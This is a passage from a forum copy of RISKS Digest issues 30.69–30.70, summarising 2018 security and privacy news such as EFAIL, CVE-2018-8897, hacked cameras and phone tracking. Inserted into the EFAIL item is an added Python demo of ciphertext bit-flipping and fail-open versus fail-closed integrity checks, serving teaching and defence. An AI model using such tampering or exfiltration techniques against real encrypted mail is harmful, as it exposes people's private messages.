    Subject: Postmortem of Fortnite Service Outage (Epic Games)

    On 11 Apr 2018, we experienced an extended outage coinciding with the
    release of Fortnite 3.5. The outage blocked all logins for all players to
    our platform. We know many millions of you were excited about dropping from
    the Battle Bus with your friends, and it was a long time to wait to check
    out our 3.5 release. We sincerely apologize for the downtime.

    We're sharing more technical details in this post to give you a better
    understanding about what went wrong, what we did to fix it, and how we can
    prevent future issues like this from happening again.

    http://www.epicgames.com/fortnite/en-US/news/postmortem-of-service-outage-4-12

    ------------------------------

    Date: Sun, 6 May 2018 16:31:20 -0700
    From: Mark Thorson <e...@dialup4less.com>
    Subject: Collateral damage (538)

    You can't opt out from other people sharing data about you, such as the
    relative of the Golden State Killer who put DNA data on a website.

    http://fivethirtyeight.com/features/you-cant-opt-out-of-sharing-your-data-even-if-you-didnt-opt-in/

    ------------------------------

    Date: Mon, 7 May 2018 16:16:28 -0400
    From: George Mannes <gma...@gmail.com>
    Subject: Dozens of security cameras hacked in Japan (Mainichi)

    from Mainichi.jp English-language site:
    http://mainichi.jp/english/articles/20180507/p2g/00m/0dm/063000c#cxrecs_s

    TOKYO (Kyodo) -- Dozens of Canon Inc.'s security cameras connected to the
    Internet have been hacked across Japan, making them uncontrollable at
    waterways, a fish market, and a care facility among other places, users said
    Monday. Over 60 cameras nationwide are believed to have been illegally
    accessed so far. ...

    While it remains unclear why Canon cameras have been targeted, the city of
    Yachiyo in Chiba Prefecture and the city of Ageo in Saitama Prefecture,
    which lost control of the cameras for monitoring the levels of their
    waterways, said they had failed to reset the cameras' default passwords.....

    Hackings were also reported at other locations including a fish market in
    Hiroshima, a care facility for the disabled in Kobe, and a Naha branch of a
    company based in Saitama Prefecture....

    [This news item seems custom-designed for a classic-style PGN joke linking
    fishy business at the market, constant comp.risks complaints about poor
    password management, and Hiroshima's hometown baseball team, the Carp. Have
    at it.]

    [OK. Carpe Diem? I had dinner in Kobe's in Lahaina (Maui) last night. I
    have no beef with this item, even if it might smell fishy. ``If you knew
    Sushi like I knew Sushi,'' oh, whatta place... ``She shells seashells by
    the seashore.'' PGN]

    ------------------------------

    Date: Wed, 9 May 2018 23:53:49 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Technology turns our cities into spies for ICE, whether we like
    it or not (LATimes)

    There are more than 30 Oakland Police Department patrol cars roaming the
    city with license plate readers, specialized cameras that can scan and
    record up to 60 license plates per second. Meanwhile, the Alameda County
    Sheriff's Office maintains a fleet of six drones to monitor crime scenes
    when it sees fit. The Alameda County district attorney's office owns a
    StingRay, a device that acts as a fake cell tower and forces phones to give
    up their location. And that's just in one little corner of California.

    Just as consumer electronics continually get faster, cheaper, smaller, and
    more sophisticated, so too do the tools law enforcement uses to spy on
    us. What once demanded significant money and manpower can be accomplished
    easily by machine. This advanced technology is hurtling toward us so fast
    that privacy laws can't keep up.

    http://www.latimes.com/opinion/op-ed/la-oe-farivar-surveillance-tech-20180502-story.html

    ------------------------------

    Date: Sun, 6 May 2018 22:22:09 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: The Digital Vigilantes Who Hack Back (The New Yorker)

    American companies that fall victim to data breaches want to retaliate
    against the culprits. But can they do so without breaking the law?

    http://www.newyorker.com/magazine/2018/05/07/the-digital-vigilantes-who-hack-back

    ------------------------------

    Date: Wed, 9 May 2018 23:57:31 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Bring in the Nerds: EFF Introduces Actual Encryption Experts to
    U.S. Senate Staff (EFF)

    Electronic Frontier Foundation

    Earlier today in the U.S. Capitol Visitor Center, EFF convened a closed-door
    briefing for Senate staff about the realities of device encryption. While
    policymakers hear frequently from the FBI and the Department of Justice
    about the dangers of encryption and the so-called Going Dark problem, they
    very rarely hear from actual engineers, cryptographers, and computer
    scientists. Indeed, the usual suspects testifying before Congress on
    encryption are nearly the antithesis of technical experts.

    The all-star lineup of panelists included Dr. Matt Blaze, professor of
    computer science at the University of Pennsylvania, Dr. Susan Landau,
    professor of cybersecurity and policy at Tufts University; Erik
    Neuenschwander, Apple's manager of user privacy; and EFF's tech policy
    director Dr. Jeremy Gillula.

    http://www.eff.org/deeplinks/2018/0...ces-actual-encryption-experts-us-senate-staff

    [Incidentally, this is the 20th anniversary of the famous L0pht testimony
    from Mudge's team, which immediately followed my testimony for the
    U.S. Permanent Subcommittee on Investigations of the Senate Committee on
    Governmental Affairs included in Weak Computer Security in Government: Is
    the Public at Risk? <http://www.csl.sri.com/neumann/senate98.html> PGN]

    ------------------------------

    Date: Mon, 14 May 2018 15:06:45 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Email Encryption Tools Are No Longer Safe, Researchers Say (Fortune)

    Throughout the many arguments over encrypted communications, there has been
    at least one constant: the venerable tools for strong email encryption are
    trustworthy. That may no longer be true.

    On Tuesday, well-credentialed cybersecurity researchers will detail what
    they call critical vulnerabilities in widely-used tools for applying PGP/GPG
    and S/MIME encryption. According to Sebastian Schinzel, a professor at the
    Münster University of Applied Sciences in Germany, the flaws could reveal
    the plaintext that email encryption is supposed to cover up -- in both
    current and old emails.

    The researchers are advising everyone to temporarily stop using plugins for
    mail clients like Microsoft Outlook and Apple Mail that automatically
    encrypt and decrypt emails -- at least until someone figures out how to
    remedy the situation. Instead, experts say, people should switch to tools
    like Signal, the encrypted messaging app that's bankrolled by WhatsApp
    co-founder Brian Acton.

    http://fortune.com/2018/05/14/email-encryption-tool-vulnerability-cybersecurity-warning/

    ------------------------------

    Date: Tue, May 15, 2018 at 12:38 AM
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw
    (EFF)

    Erica Portnoy, Danny O'Brien, and Nate Cardozo, EFF, 14 May 2018
    http://www.eff.org/deeplinks/2018/05/not-so-pretty-what-you-need-know-about-e-fail-and-pgp-flaw-0

    Don't panic! But you should stop using PGP for encrypted email and switch
    to a different secure communications method for now.

    A group of researchers released a paper today that describes a new class of
    serious vulnerabilities in PGP (including GPG), the most popular email
    encryption standard. The new paper includes a proof-of-concept exploit that
    can allow an attacker to use the victim's own email client to decrypt
    previously acquired messages and return the decrypted content to the
    attacker without alerting the victim. The proof of concept is only one
    implementation of this new type of attack, and variants may follow in the
    coming days.

    Because of the straightforward nature of the proof of concept, the severity
    of these security vulnerabilities, the range of email clients and plugins
    affected, and the high level of protection that PGP users need and expect,
    EFF is advising PGP users to pause in their use of the tool and seek other
    modes of secure end-to-end communication for now.

    Because we are awaiting the response from the security community of the
    flaws highlighted in the paper, we recommend that for now you uninstall or
    disable your PGP email plug-in. These steps are intended as a temporary,
    conservative stopgap until the immediate risk of the exploit has passed and
    been mitigated against by the wider community. There may be simpler
    mitigations available soon, as vendors and commentators develop narrower
    solutions, but this is the safest stance to take for now, because sending
    PGP-encrypted emails to an unpatched client will create adverse ecosystem
    incentives to open incoming emails, any of which could be maliciously
    crafted to expose ciphertext to attackers.

    While you may not be directly affected, the other participants in your
    encrypted conversations are likely to be. For this attack, it isn't
    important whether the sender or the receiver of the original secret message
    is targeted. This is because a PGP message is encrypted to both of their
    keys.

    At EFF, we have relied on PGP extensively both internally and to secure
    much of our external-facing email communications. Because of the severity
    of the vulnerabilities disclosed today, we are temporarily dialing down our
    use of PGP for both internal and external email.

    Our recommendations may change as new information becomes available, and we
    will update this post when that happens.

    How The Vulnerabilities Work

    PGP, which stands for Pretty Good Privacy, was first released nearly 27
    years ago by Phil Zimmermann. Extraordinarily innovative for the time, PGP
    transformed the level of privacy protection available for digital
    communications, and has provided tech-savvy users with the ability to
    encrypt files and send secure email to people they've never met. Its strong
    security has protected the messages of journalists, whistleblowers,
    dissidents, and human rights defenders for decades. While PGP is now a
    privately-owned tool, an open source implementation called GNU Privacy
    Guard (GPG) has been widely adopted by the security community in a number
    of contexts, and is described in the OpenPGP Internet standards document.

    The paper describes a series of vulnerabilities that all have in common
    their ability to expose email contents to an attacker when the target opens
    a maliciously crafted email sent to them by the attacker. In these attacks,
    the attacker has obtained a copy of an encrypted message, but was unable to
    decrypt it.

    The first attack is a direct exfiltration attack that is caused by the
    details of how mail clients choose to display HTML to the user. The
    attacker crafts a message that includes the old encrypted message. The
    new message is constructed in such a way that the mail software
    displays the entire decrypted message -- including the captured
    ciphertext -- as unencrypted text. Then the email client's HTML parser
    immediately sends or exfiltrates the decrypted message to a server
    that the attacker controls.

    The second attack abuses the underspecification of certain details in the
    OpenPGP standard to exfiltrate email contents to the attacker by modifying
    a previously captured ciphertext. Here are some technical details of the
    vulnerability, in plain-as-possible language:

    When you encrypt a message to someone else, it scrambles the information
    into ciphertext such that only the recipient can transform it back into
    readable plaintext. But with some encryption algorithms, an attacker can
    modify the ciphertext, and the rest of the message will still decrypt back
    into the correct plaintext. This property is called malleability. This
    means that they can change the message that you read, even if they can't
    read it themselves.

    To address the problem of malleability, modern encryption algorithms add
    mechanisms to ensure integrity, or the property that assures the recipient
    that the message hasn't been tampered with. But the OpenPGP standard says
    that it's ok to send a message that doesn't come with an integrity check.
    And worse, even if the message does come with an integrity check, there are
    known ways to strip off that check. Plus, the standard doesn't say what to
    do when the check fails, so some email clients just tell you that the check
    failed, but show you the message anyway. ...

    http://dewaynenet.wordpress.com/feed/
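
    To make the malleability and integrity-check points in the EFF piece concrete,
    here is an added Python example (not EFF's text and not OpenPGP/GPG code). It
    uses a constructed toy keystream (SHA-256 in counter mode) as a stand-in for
    any malleable encryption mode, and HMAC-SHA256 as a stand-in for the integrity
    check; OpenPGP's actual MDC is a different construction. The keys, nonce and
    message are constructed values. It shows three things the text describes: a
    one-bit change to the ciphertext changes exactly one plaintext byte and leaves
    the rest intact, a decryptor that verifies before releasing plaintext refuses
    the tampered message (and a message with no check at all), and a decryptor
    that "tells you the check failed but shows the message anyway" hands the
    tampered plaintext to the caller.

```python
import hashlib
import hmac

# Constructed demo values; not derived from any real system or key.
ENC_KEY = b"\x11" * 32
MAC_KEY = b"\x22" * 32
NONCE = b"demo-nonce-0001"
MESSAGE = b"Wire 100 USD to account 42 by Friday."
TAG_LEN = 32


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Toy keystream: SHA-256 over key||nonce||counter, in counter mode.
    Stands in for any malleable mode (OpenPGP uses CFB); not for production."""
    out = bytearray()
    block = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + block.to_bytes(8, "big")).digest()
        block += 1
    return bytes(out[:length])


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(plaintext: bytes) -> bytes:
    """Unauthenticated encryption: ciphertext only, no integrity check."""
    return xor_bytes(plaintext, keystream(ENC_KEY, NONCE, len(plaintext)))


def decrypt(ciphertext: bytes) -> bytes:
    return xor_bytes(ciphertext, keystream(ENC_KEY, NONCE, len(ciphertext)))


def malleability_demo(offset: int) -> dict:
    """Flip one ciphertext bit at `offset`; only that plaintext byte changes,
    and the cipher itself gives no sign that anything was modified."""
    ct = bytearray(encrypt(MESSAGE))
    ct[offset] ^= 0x01
    pt = decrypt(bytes(ct))
    changed = [i for i, (a, b) in enumerate(zip(MESSAGE, pt)) if a != b]
    rest_intact = pt[:offset] == MESSAGE[:offset] and pt[offset + 1:] == MESSAGE[offset + 1:]
    return {"changed_positions": changed, "rest_intact": rest_intact}


def encrypt_then_mac(plaintext: bytes) -> bytes:
    """Encrypt, then append an HMAC-SHA256 tag over nonce||ciphertext.
    The tag plays the role of the integrity check discussed in the text."""
    ct = encrypt(plaintext)
    return ct + hmac.new(MAC_KEY, NONCE + ct, hashlib.sha256).digest()


def decrypt_fail_closed(blob: bytes) -> bytes:
    """Correct handling: require the tag, verify it first, and withhold the
    plaintext entirely on mismatch or when the check is missing."""
    if len(blob) < TAG_LEN:
        raise ValueError("no integrity tag present; message rejected")
    ct, tag = blob[:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(MAC_KEY, NONCE + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("integrity check failed; plaintext withheld")
    return decrypt(ct)


def decrypt_fail_open(blob: bytes) -> tuple:
    """The behaviour the text criticizes: report that the check failed but
    still return the (possibly tampered) plaintext for display."""
    ct, tag = blob[:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(MAC_KEY, NONCE + ct, hashlib.sha256).digest()
    return hmac.compare_digest(tag, expected), decrypt(ct)


def integrity_demo(offset: int) -> dict:
    """Apply the same one-bit change to an authenticated message and compare
    how the fail-closed and fail-open decryptors respond."""
    blob = bytearray(encrypt_then_mac(MESSAGE))
    blob[offset] ^= 0x01  # offset lies inside the ciphertext, not the tag
    tampered = bytes(blob)
    try:
        decrypt_fail_closed(tampered)
        closed_released = True
    except ValueError:
        closed_released = False
    open_ok, open_pt = decrypt_fail_open(tampered)
    return {
        "fail_closed_released_plaintext": closed_released,
        "fail_open_check_passed": open_ok,
        "fail_open_released_plaintext": len(open_pt) == len(MESSAGE),
        "untampered_roundtrip": decrypt_fail_closed(encrypt_then_mac(MESSAGE)) == MESSAGE,
    }


if __name__ == "__main__":
    print(malleability_demo(5))
    print(integrity_demo(5))
```

    The design point is in decrypt_fail_closed: the integrity decision is made
    before any plaintext leaves the function, and a message that simply omits the
    check is rejected rather than accepted as "unprotected but readable", which
    is the permissive behaviour the text attributes to the OpenPGP standard and
    to some clients.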

    ------------------------------

    Date: Wed, 9 May 2018 23:50:09 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Once Again, Activists Must Beg the Government to Preserve the
    Right to Repair (Motherboard)

    The excruciating DMCA section 1201 exemption process is upon us again,
    and the right to repair tractors, cars, and electronics is at stake.

    http://motherboard.vice.com/en_us/article/mbxzyv/dmca-1201-exemptions

    ------------------------------

    Date: Thu, 10 May 2018 04:34:02 -0700
    From: Bob Gezelter <geze...@rlgsc.com>
    Subject: Widespread Misunderstanding of x86-64 Privileged Instruction
    Leads to Widespread Escalation Hazard (MITRE CVE 2018-8897)

    Apparently, a large number of kernel-level developers have misunderstood the
    documentation concerning the interruptability of an x86-64 instruction. This
    misunderstanding has made many major operating systems on the x86-64
    platform vulnerable to a privilege escalation hazard.

    Patches have reportedly been issued. Intel has also re-issued its x86-64
    Software Development Manuals.

    A description of the vulnerability can be found at:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8897

    [For those of you following the CVE list, it has just exceeded 100,000 CVE
    entries. This should be a warning for anyone reading RISKS who believes
    our computer systems are secure. PGN]

    ------------------------------

    Date: Thu, 10 May 2018 18:01:36 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Alexa and Siri Can Hear This Hidden Command Audio Attacks (NYTimes)

    http://www.nytimes.com/2018/05/10/technology/alexa-siri-hidden-command-audio-attacks.html

    Researchers can now send secret audio instructions undetectable to the human
    ear to Apple's Siri, Amazon's Alexa and Google's Assistant.

    ------------------------------

    Date: Fri, 11 May 2018 11:15:06 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Buckle Up, Prime Members: Amazon Launches In-Car Delivery
    (Business Wire)

    Millions of Prime members with Chevrolet, Buick, GMC, Cadillac and Volvo
    cars can now use Amazon Key to have their Amazon packages delivered inside
    their vehicle parked at home, work or near other locations in their address
    book.

    In-car delivery is available at no extra cost for Prime members -- customers
    simply download the Amazon Key App, link to their connected car and start
    ordering on Amazon.com; no additional hardware or devices required.

    To get started, customers download the Amazon Key App and then link their
    Amazon account with their connected car service account. Once setup is
    complete and the delivery location has been registered, customers can shop
    on Amazon.com and select the In-Car delivery option at checkout.

    On delivery day, the Amazon Key App lets customers check if they've parked
    within range of the delivery location, and provides notifications with the
    expected 4-hour delivery time window. The App also notifies customers when
    the delivery is on its way, and the package has been delivered. Customers
    can track when their car was unlocked and relocked in the App's activity
    feed, and rate their in-car delivery.

    http://www.businesswire.com/news/ho...Prime-Members-Amazon-Launches-In-Car-Delivery

    ------------------------------

    Date: Sat, 12 May 2018 02:30:18 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Meant to Monitor Inmates' Calls Could Track You Too (NYTimes)

    http://www.nytimes.com/2018/05/10/technology/cellphone-tracking-law-enforcement.html

    A company catering to law enforcement and corrections officers has raised
    privacy concerns with a product that can locate almost anyone's cellphone
    across the United States.

    ------------------------------

    Date: Sat, 12 May 2018 06:38:12 -0700
    From: Bob Gezelter <geze...@rlgsc.com>
    Subject: Cell Phone Location data reportedly available to law enforcement
    without verification/process (Ars Technica)

    Ars Technica is reporting that a service meant for use with prison phone
    systems lacks authentication and safeguards. It has reportedly already been
    used to track people without legal jurisdiction.

    Access to non-anonymized geolocation data for mobile devices by third
    parties is a serious privacy hazard. The article does not indicate the
    degree of reporting or other measures undertaken to ensure accountability.
    In this context, even advertising delivered to an identifiable device is a
    hazard.

    http://arstechnica.com/tech-policy/...bility-to-get-real-time-mobile-location-data/

    ------------------------------

    Date: Sun, 13 May 2018 11:08:59 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: During disasters, active Twitter users likely to spread
    falsehoods: Study examines Boston Marathon bombing, Hurricane Sandy; also
    finds most users fail to correct misinformation (Science Daily)

    http://www.sciencedaily.com/releases/2018/05/180512190537.htm

    ------------------------------

    Date: Sun, 13 May 2018 10:01:11 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: "Warning: Dangerous Fake Emails About Google Privacy Changes"
    (Lauren's Blog)
    http://lauren.vortex.com/2018/05/13/warning-dangerous-fake-emails-about-google-privacy-changes

    If you use much of anything Google, by now you've likely gotten at least one
    email from Google noting various privacy-related changes. They typically
    have the Subject:

    Improvements to our Privacy Policy and Privacy Controls

    and tend to arrive not from the expected simple "google.com" domain but
    rather from unusual appearing Google subdomains, with addresses like:

    privacy...@www3.l.google.com

    The notice also includes a bunch of links to various relevant privacy pages
    and/or systems at Google.

    All of this is in advance of the effective date for the European Union's
    "GDPR" laws. If you're not familiar with the GDPR, it's basically the latest
    hypocritical move by the EU on their relentless march toward dictating the
    control of personal data globally and to further their demands to become a
    global censorship czar -- with the ability to demand the deletion of any
    search engine results around the world that they find inconvenient. Joseph
    Stalin would heartily approve.

    One can assume that Google's privacy team has been putting in yeoman's
    service to meet the EU's dictatorial demands, and it's logical that Google
    decided to make other changes in their privacy ecosystem at the same time,
    and now is informing users about those changes.

    Unfortunately, phishing crooks are apparently already taking advantage of
    this situation -- in particular several aspects of these Google notification
    emails.

    First, the legitimate Google privacy emails going out recently and
    currently are a veritable flood. It appears that Google is sending
    these out to virtually every email address ever associated with any
    Google account since perhaps the dawn of time. I've already received
    approximately 1.3E9 of them. OK, not really that many, but it FEELS
    like that many.

    Some of these are coming in to addresses that I don't even recognize.
    This morning one showed up to such a strange address that I had to go
    digging in my alias databases to figure out what it actually was. It
    turned out to be so ancient that cobwebs flew out of my screen at me
    when I accessed its database entry.

    Seriously, these are one hell of a lot of emails, and the fact that
    they come from somewhat unusual looking google subdomains and include
    links has made them fodder for the crooks.

    You can guess what's happening. Phishing and other criminal types are
    sending out fraudulent emails that superficially appear to be the same
    as these legit Google privacy policy notification emails. Of course,
    some or all of the links in the phishing emails lead not to Google but
    to various evil traps and personal data stealing tricks.

    So please, be extraordinarily careful when you receive what appear to be
    these privacy notices from Google. With so many real ones going out -- with
    multiples often ending up at the same individual via various redirects and
    forwarding addresses -- it's easy for fake versions to slip in among the
    real ones, and clicking on the links in the crooked ones or opening
    attachments that they include can seriously ruin your day, to say the very
    least.

    Take care, all.

    ------------------------------

    Date: Mon, 14 May 2018 18:12:34 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Face recognition police tools 'staggeringly inaccurate' (BBC.com)

    'The Metropolitan Police used facial recognition at London's Notting Hill
    carnival in 2016 and 2017 and at a Remembrance Sunday event. 'Its system
    incorrectly flagged 102 people as potential suspects and led to no
    arrests. 'In figures given to Big Brother Watch, South Wales Police said
    its technology had made 2,685 "matches" between May 2017 and March 2018 -
    but 2,451 were false alarms. 'Big Brother Watch also raised concerns that
    photos of any "false alarms" were sometimes kept by police for weeks.'

    Perhaps the UK should import and deploy PRC cameras per RISKS-30.65.

    ------------------------------

    Date: Tue, 15 May 2018 13:25:53 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Intel Documentation Blamed for Multiple Operating System Security
    Flaws (IT Pro)

    Anybody who's been involved with tech for a while has most likely come
    across the expression "RTFM" on more than one occasion. Usually delivered
    with a degree of snark, if not downright hostility, the initialism stands
    for "read the ... manual," with an expletive added for good
    measure. As is often pointed out, the advice is not only rude, it's also
    often not helpful. Sometimes there is no documentation to read and if there
    is, it's poorly written and difficult to understand.

    The latter seems to be the case with CVE-2018-8897, the latest operating
    system vulnerability.

    On May 8, Nick Peterson of Everdox Tech and Nemanja Mulasmajic of
    triplefault.io, made public a research paper that revealed all major
    operating systems -- Linux, Apple, Windows and BSD -- to be affected by a
    flaw that can allow authenticated users to read data in memory or control
    low-level OS functions. The good news is that the researchers notified
    software developers of the problem on April 30, and by the time it was made
    public, patches were at the ready.

    http://www.itprotoday.com/endpoint-...lamed-multiple-operating-system-security-flaw

    ------------------------------

    Date: Tue, 15 May 2018 17:52:40 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: The Problem with Chinese GPS (Now I Know)

    If you're in a foreign country and try to read a map, you may find it
    difficult -- unless your host nation's language is the same as your home
    nation's, the words are going to be different and, assuming you're not
    bilingual, will require some translation. But the locations of the roads,
    rivers, buildings, and the like should be the same, regardless of whether
    the map is in English, Spanish, or Chinese, right? Language aside, Google
    Maps should work the same everywhere, right?

    Well, no.

    http://nowiknow.com/the-problem-with-chinese-gps/

    ------------------------------

    Date: Tue, 15 May 2018 19:06:04 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: U.S. identifies suspect in major leak of CIA hacking tools (WashPo)

    The former agency employee is being held in a Manhattan jail on unrelated
    charges.

    http://www.washingtonpost.com/world...5ef3f8-5865-11e8-8836-a4a123c359ab_story.html

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.69
    ************************
  3. LakeGator

    Risks Digest 30.70

    RISKS List Owner

    May 26, 2018 7:09 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Saturday 26 May 2018 Volume 30 : Issue 70

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Boy, 9, dies in accident involving motorized room partition at his
    Fairfax school (WashPo)
    Don't Put That in My Heart Until You're Sure It Really Works (NYT)
    "Ex-Intel security expert: This new Spectre attack can even
    reveal firmware secrets" (Liam Tung)
    "This malware is harvesting saved credentials in Chrome, Firefox
    browsers" (ZDNet)
    Student awarded $36,000 for remote execution flaw in Google App Engine
    (Charlie Osborne)
    "This cryptocurrency phishing attack uses new trick to drain wallets"
    (Danny Palmer)
    Ex-JPMorgan Chase Blockchain Duo Unveil New Startup Clovyr (Fortune)
    ICE abandons its dream of ‘extreme vetting’ software that could
    E-Mail Clients are Insecure, PGP and S/MIME 100% secure
    E-mail Encryption Tools Are No Longer Safe, Researchers Say (Fortune)
    Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw (EFF)
    "T-Mobile bug let anyone see any customer's account details"
    (Zack Whittaker)
    "Senator wants to know how police can locate any phone in seconds without
    a warrant" (Zach Whittaker)
    US cell carriers are selling access to your real-time phone location data
    (Zach Whittaker)
    Hundreds of Apps Can Empower Stalkers to Track Their Victims (NYTimes)
    "Voice squatting attacks: Hacks turn Amazon Alexa, Google Home into
    secret eavesdroppers" (CSO Online)
    So, Umm, Google Duplex's Chatter Is Not Quite Human (Scientific American)
    Henry Kissinger Is Scared of 'Unstable' Artificial Intelligence (The Wrap)
    Service Meant to Monitor Inmates' Calls Could Track You, Too (NYT)
    Gunshot Sensors Pinpoint Destructive Fish Bombs (SciAm)
    Most GDPR emails unnecessary and some illegal, say experts (The Guardian)
    The Pentagon Has a Big Plan to Solve Identity Verification in Two Years
    (Defense One)
    Unplug Your Echo! (Ars Technica)
    FBI dramatically overstates how many phones they can't get into (WaPo)
    "Google to remove "secure" indicator from HTTPS pages on Chrome" (ZDNet)
    Google's Selfish Ledger is an unsettling vision of Silicon Valley social
    engineering (The Verge)
    "A flaw in a connected alarm system exposed vehicles to remote hacking"
    (ZDNet)
    Syrian hackers who tricked reporters indicted (WashPo)
    Cisco critical flaw warning: These 10/10 severity bugs need patching now
    (ZDNet)
    Is technology bringing history to life or distorting it? (WashPo)
    Massachusetts ponders hiring a computer to grade MCAS essays.
    What could go wrong? (The Boston Globe)
    Grocery store censors cake with request for 'summa cum laude'
    (The Boston Globe)
    The surprising return of the repo man (WashPo)
    Trump feels presidential smartphone security is too inconvenient
    (Ars Technica)
    Trump Jr. and Other Aides Met With Gulf Emissary Offering Help to Win
    Election (NY Times)
    Re: Securing Elections (Mark E. Smith)
    Re: Dark code (Kelly Bert Manning, Richard O'Keefe)
    Fitness App Leads To Arrest For Attack On McLean Cyclist (McLean VA Patch)
    Man Is Charged With Hacking West Point and Government Websites (NYT)
    Fake Facebook accounts and online lies multiply in hours after Santa Fe
    school shooting (WashPo)
    Re: "Warning: Dangerous Fake Emails About Google Privacy Changes" (Wol)
    Re: Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw
    (Yooly)
    Re: Deadly Convenience: Keyless Cars and Their Carbon Monoxide Toll (NYT)
    Re: Chinese GPS (Dimitri Maziuk)
    Re: The risk from robot weapons (Amos Shapir)
    Will You Be My Emergency Contact Takes On a Whole New Meaning (NYT)
    This fertility doctor is pushing the boundaries of human reproduction
    -- with little regulation (WashPo)
    As DIY Gene Editing Gains Popularity, `Someone Is Going to Get Hurt'
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Tue, 22 May 2018 09:31:51 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Boy, 9, dies in accident involving motorized room partition at his
    Fairfax school (WashPo)

    Boy, 9, dies in accident involving motorized room partition at his Fairfax school

    ------------------------------

    Date: Mon, 21 May 2018 19:30:25 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Don't Put That in My Heart Until You're Sure It Really Works
    (NYTimes)

    Opinion | Don’t Put That in My Heart Until You’re Sure It Really Works

    'The bar for approval of medical devices is too low. There is no reason we
    shouldn’t require, as we almost always do for drugs, a randomized
    placebo-controlled trial showing improvements in “hard” outcomes like
    mortality before approving them.

    'Unfortunately, the United States may soon make it even easier for medical
    devices to reach the patient’s bedside. The Food and Drug Administration is
    considering requiring less upfront research and instead adding increased
    oversight after a device has been introduced into the market. The argument
    is that this will spur technological innovation and perhaps help terminally
    ill patients. However, loosening regulations could extract a steep cost from
    patients and the health system.'

    Greater release frequency with less rigorous pre-production qualification
    criteria and test coverage is NOT a recipe for safe and viable embedded
    software stacks that drive these gizmos. Suppressing production defect
    escape potential is challenging. Proactive techniques that facilitate early
    and rapid software defect discovery capability -- such as continuous
    integration and high-speed regression -- are effective when capable test
    authors challenge software stack authors. Alas, industry (not just embedded
    medical implants, cars, cellphones, etc.) often economizes on qualification
    product life cycle stages. There are "too many bits" to test quickly and
    thoroughly. Governance decisions and gut judgment are sometimes applied with
    impunity.

    It appears that the FDA has gone rogue, and off-the-rails via regulatory
    capture. A business-friendly administration promoting "caveat emptor" as
    standard operating procedure also intensifies medical device implantation
    risks. Refer to "The Danger Within Us: America's Untested, Unregulated
    Medical Device Industry and One Man's Battle to Survive It" by Jeanne Lenzer
    for an exposé of the implantable medical device industry.

    If you are confronted with a "hard sell" to "go" for implantation, ask
    a few questions of your physician and the device salesperson:

    Are there any randomized control trials and non-industry funded studies that
    evaluate the candidate device's effectiveness in humans? Were the studies
